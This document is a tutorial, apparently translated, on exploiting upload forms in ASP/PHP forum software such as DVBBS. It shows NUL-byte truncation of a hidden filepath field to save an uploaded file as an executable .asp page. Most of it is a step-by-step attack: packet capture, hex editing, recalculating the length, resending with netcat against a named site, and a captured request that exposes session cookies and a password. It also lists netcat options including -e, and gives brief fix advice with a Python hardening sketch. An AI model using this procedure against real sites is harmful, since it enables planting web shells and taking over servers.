Exploring PHP and ASP Upload Vulnerabilities
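1 The exploitation principle described here applies only to ASP and PHP scripts that accept uploads through an HTML form
nc (netcat)
Used to submit the data packet
Run at the DOS prompt:
nc -vv www.***.com 80 < 1.txt
-vv: verbose output
80: the www port
1.txt: the data packet you want to send (for more usage, see the posts in this section)
wse (WSockExpert): monitors ports on the local machine and captures the packets IE submits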
2 How the vulnerability works
The examples below assume:
www host: www.***.com;
bbs path: /bbs/
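The vulnerability was found while studying the file upload in DVBBS. Readers with some programming experience should look at DVBBS's upfile.asp; there is no need to understand all of it. upfile performs the upload through a form that it generates.
The variables used: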
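filepath: default value uploadface, attribute hidden
act: default value upload, attribute hidden
file1: the file you want to upload
The key is the filepath variable!
By default our file is uploaded to www.***.com/bbs/uploadface/
The file is named after the upload time, by this line in upfile: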
filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext
--------------------------------------
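We know that data in a computer is terminated by "\0". Anyone who has used C knows: char data[]="bbs" gives a data array of length 4: b b s \0
What happens if we construct filepath as follows?
filepath="/newmm.asp\0"
The file we upload at 2004.09.24.08.24 then ends up somewhere else.
Without the change: http://www.***.com/bbs/uploadface/200409240824.jpg
With our constructed filepath: http://www.***.com/newmm.asp\0/200409240824.jpg
When the server receives the filepath data, it detects the \0 after newmm.asp and treats the filepath data as finished at that point. So the file we upload, for example c:.asp, is saved as: http://www.***.com/newmm.asp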
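3 Follow-up notes
After the vulnerability was published, many sites took some action, but their filtering and handling of filepath is still inadequate. Many sites only added n hidden variables to counter the upfile.exe that was published online (the upload exploit tool) or the filepath variable tool (Laobing's)... but they did not change the most basic thing. Many site plugins also contain similar vulnerabilities. My point is not to rely on those dedicated tools. Change the filepath variable in the packet captured by wse yourself, then submit it with nc. Even if the site adds n hidden variables, it does not help. Of course, if filepath is filtered very strictly, these theories of ours come to an end, and that is when our new theory will be born!
4 Detailed example
I. wse capture result (saved to 1.txt):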
post /bbs/upphoto/upfile.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://www.xin126.com/bbs/upphoto/upload.asp
accept-language: zh-cn
content-type: multipart/form-data; boundary=-----------7d423a138d0278
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
host: www.xin126.com
content-length: 1969
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"

../medias/myphoto/
-----------------------------7d423a138d0278
... ...
Upload
---------------7d423a138d0278-----------------
II. Open 1.txt in UltraEdit and change the data:
......
-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"
/newmm.asp
......
----------------------------
III. Recalculate the cookies length, then submit with nc
nc -vv www.xin126.com 80 < 1.txt
UltraEdit is a hex editor that can be downloaded online.
We mainly use it to write the terminator \0 ====> in hexadecimal: 0x00 or 00h
In practice, when editing, just add a 00 byte directly at the end of filepath.
Calculating the cookies length ===> once you have changed filepath, the length has certainly grown or shrunk, so the cookies length has changed:
......
host: www.xin126.com
content-length: 1969
connection: keep-alive
cache-control: no-cache
......
You can do the calculation, right? Each letter or digit counts as 1.
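Suggested approaches to fixing the upload vulnerability (for reference only):
1. Upload code usually handles the upload path as a variable
===> our countermeasure is to turn filepath into a constant...
This is currently the most effective method (in my opinion)
2. Strengthen the handling of \0. Originally, reading stops when it is reached;
instead, keep reading until the start of the next variable and process from there.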
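The two fixes above next to the flawed pattern, as an added Python sketch (not DVBBS code and not from the original article). UPLOAD_DIR, ALLOWED_EXT and the function names are assumptions; fs_view models a file API that stops at the first NUL byte, and the hardened version rejects NUL bytes outright rather than reading past them.

```python
import posixpath
import secrets
import time

UPLOAD_DIR = "/var/www/bbs/uploadface"        # assumed constant, never read from the request
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}   # assumed allow-list of image extensions


def fs_view(path: str) -> str:
    """Model of a C-string file API: everything from the first NUL on is ignored."""
    return path.split("\x00", 1)[0]


def vulnerable_target(filepath: str, fileext: str, stamp: str) -> str:
    """Flawed pattern: client-supplied filepath + timestamp + "." + extension."""
    return fs_view(filepath + stamp + "." + fileext)


def hardened_target(form: dict, client_name: str) -> str:
    """Fix 1: the directory is a constant. Fix 2: a NUL byte fails the request."""
    for field, value in list(form.items()) + [("filename", client_name)]:
        if "\x00" in value:
            raise ValueError(f"NUL byte in field {field!r}")
    # The extension is the only part of the client file name that is used.
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # The stored name is generated server-side; form["filepath"] is never consulted.
    name = time.strftime("%Y%m%d%H%M%S") + secrets.token_hex(4) + "." + ext
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    if posixpath.dirname(target) != UPLOAD_DIR:
        raise ValueError("target escaped the upload directory")
    return target


if __name__ == "__main__":
    stamp = "200409240824"  # constructed sample timestamp, as in the article
    print(vulnerable_target("uploadface/", "jpg", stamp))
    print(vulnerable_target("/newmm.asp\x00", "jpg", stamp))
    print(hardened_target({"filepath": "../medias/myphoto/", "act": "upload"}, "me.jpg"))
```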
Appendix: NC usage:
Connect to a remote host:
nc [-options] hostname port[s] [ports] ...
Listen on the local host:
nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only ip addresses, no dns
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer telnet negotiation
-u udp mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-i/o mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
